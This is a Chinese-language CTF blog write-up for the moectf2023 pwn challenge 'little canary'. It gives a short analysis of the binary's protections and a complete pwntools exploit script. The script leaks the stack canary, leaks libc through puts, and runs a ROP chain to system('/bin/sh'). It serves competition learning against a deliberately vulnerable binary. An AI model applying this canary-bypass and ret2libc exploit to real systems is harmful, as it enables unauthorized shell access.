moectf2023 - little canary

RocketDev
  2023-09-25 12:00 2023-09-25 12:00 创建   2024-07-25 12:34:56 2024-07-25 12:34:56 更新      

文件分析

下载pwn, NX on, PIE off, Canary on, RELRO partial
ghidra分析为64位程序

解题思路

先溢出字符数组读取Canary的值

Canary的第一字节是\0,需要先覆盖才能打印出后面内容,之后还要还原

获取canary的值后就可以考虑rop
由于不存在后门且开了NX,所以后面根据ret2libc做即可

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import LibcSearcher
from pwn import *

sh = remote('localhost', 43655)

# payload 1
sh.sendline(b'0'*68 + b'FLAG') # override the canary first byte '\0' with '\n'

sh.recvuntil(b'FLAG\n') # skip
canary = u64(b'\0' + sh.recvline()[:7]) # restore the overrided '\0'

elf = ELF('canary')
putsPlt = elf.plt['puts']
putsGot = elf.got['puts']
popRdiAddr = 0x00401343
vulnAddr = elf.symbols['vuln']

# payload 2
sh.sendline(b'0'*72 + p64(canary) + b'0'*8 + p64(popRdiAddr) + p64(putsGot) + p64(putsPlt) + p64(vulnAddr))

sh.recvline() # skip
putsGotAddr = u64(sh.recvline()[-7:-1] + b'\0\0')
libc = LibcSearcher.LibcSearcher("puts", putsGotAddr & 0xfff)
libcBase = putsGotAddr - libc.dump("puts")
shstrAddr = libcBase + libc.dump("str_bin_sh")
systemAddr = libcBase + libc.dump("system")
retAddr = 0x004012b9

# payload 3
sh.sendline(b'skip this input')

# payload 4
sh.sendline(b'0'*72 + p64(canary) + b'0'*8 + p64(popRdiAddr) + p64(shstrAddr) + p64(retAddr) + p64(systemAddr))

sh.interactive()

Done.

  • 标题: moectf2023 - little canary
  • 作者: RocketDev
  • 创建于 : 2023-09-25 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2023/09/25/little_canary/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
moectf2023 - little canary
  1. 文件分析
  2. 解题思路
  3. EXPLOIT